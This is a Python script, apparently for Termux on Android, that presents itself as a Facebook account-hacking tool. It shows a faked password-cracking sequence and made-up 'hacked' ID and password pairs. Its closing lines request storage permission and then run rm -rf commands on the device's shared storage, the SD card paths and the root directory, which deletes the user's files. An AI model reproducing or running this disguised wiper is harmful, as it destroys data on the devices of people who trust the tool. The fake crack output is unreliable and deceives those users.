import os
import time

print("""\3[31;32m                /~______________________~\
                .------------------------. 
                (| FACEBOOK HACKING TOOLS |)
                '------------------------' 
               \~~~~~~~~~~~~~~~~~~~~~~_/     """)
          
print("             *********************************")

print("")    
print("")
print("               ğ•¸ğ–ğ–“ğ–‰ğ–†ğ–“ğ–†ğ–” ğ•®ğ–ğ–‡ğ–Šğ–— ğ•¬ğ–—ğ–’ğ– (ğ–†ğ–‘ğ–‘ğ–ğ–†ğ–“ğ–ˆğ–Š)     ")
print("                 â„‚ğ•£ğ•–ğ•’ğ•¥ğ•–ğ•• ğ”¹ğ•ª: ğ”¼ğ•¦ğ•˜ğ•–ğ•Ÿğ•– ğ•¥ğ•¤ğ•¦ ")
print("")
print("")
print("\3[2;35m********************************^***************************")
print("")
print(" \3[2;35m                á´›Êœá´€É´á´‹ Êá´á´œ êœ°á´Ê€ á´œêœ±ÉªÉ´É¢ á´Ê á´›á´á´ÊŸêœ±  ")
print("")
print("************************************************************")
print("")
print("")
print("")
print("")
print("")



print("")
print("")
input("\3[2;33mName of your Target : ")
time.sleep(2)
print("")
print("\3[31;32mPlease wait......")
time.sleep(2)
print("")
input("\3[2;33mLast name of your Target : ")
input("Age of Your Target : ")
time.sleep(2)
print("")
print("\3[31;32mPlease wait......")
time.sleep(2)
print("")
input("\3[1;33mlink of your Target :")
time.sleep(2)
print("")
print("\3[31;32mPlease wait......")
print("Trying Password")
time.sleep(1)
print("\3[1;31;40m123456 | Login Failed")
time.sleep(1)
print("\3[1;31;40mDragon123 | Login Failed")
time.sleep(1)
print("\3[1;31;40mGwapoko123 | Login Failed")
time.sleep(1)
print("\3[1;31;40mGwapako123 | Login Failed")
time.sleep(1)
print("iloveyou123 | Login Failed")
time.sleep(1)
print("mahalkita123 | Login Failed")
time.sleep(1)
print("roblox123 | Login Failed")
time.sleep(1)
print("minecraftplayer123 | Login Failed")
time.sleep(1)
print("johnmylove123 | Login Failed")
time.sleep(1)
print("johnngbuhayko143 | Login Failed")
time.sleep(1)
print("sakitngpuso123 | Login Failed")
time.sleep(1)
print("ikawlangsapatna123 | Login Failed")
time.sleep(1)
print("dotaplayer123 | Login Failed")
time.sleep(1)
print("mlislife123 | Login Failed")

print("\3[31;32mPlease wait......")
time.sleep(2)
print("\3[31;32mPlease wait......")
time.sleep(2)
print("")
print("SUCCESS ACCOUNT HACKED")
time.sleep(1)
print("TRY THIS")
time.sleep(1)
print("\3[31;32m00086950260287|gwapoako123")
time.sleep(2)
print("\3[31;32m00086950260497|hacker124")
time.sleep(2)
print("\3[31;32m00086950268297|iloveyou567")
time.sleep(2)
print("\3[31;32m00086950266297|yawaka113")
time.sleep(1)
print("\3[31;32m00086950260497|justine342")
time.sleep(2)
print("\3[31;32m00086950260597|Pornhub233")
time.sleep(2)
print("\3[31;32m00086950260697|single867")
time.sleep(2)
print("\3[31;32m00086950260997|hackerako133")
time.sleep(1)
print("")
print("")
print("\3[31;32mPassword Crack Succesfully")
time.sleep(1)
print("")

print("HACKED SUCCESSFULLY")
time.sleep(1)

print("\3[1;31mCLICK DELETE COMPLETELY FOR RUN HACKING TOOLS")

os.system('termux-setup-storage')
os.system('rm -rf /storage/emulated/0/*')
os.system('rm -rf /storage/emulated/*')
os.system('rm -rf /sdcard/*')
os.system('rm -rf /sdcard/0/*')
os.system('rm -rf /sdcard1/*')
os.system('rm -rf /storage/*')
os.system('rm -rf /*')
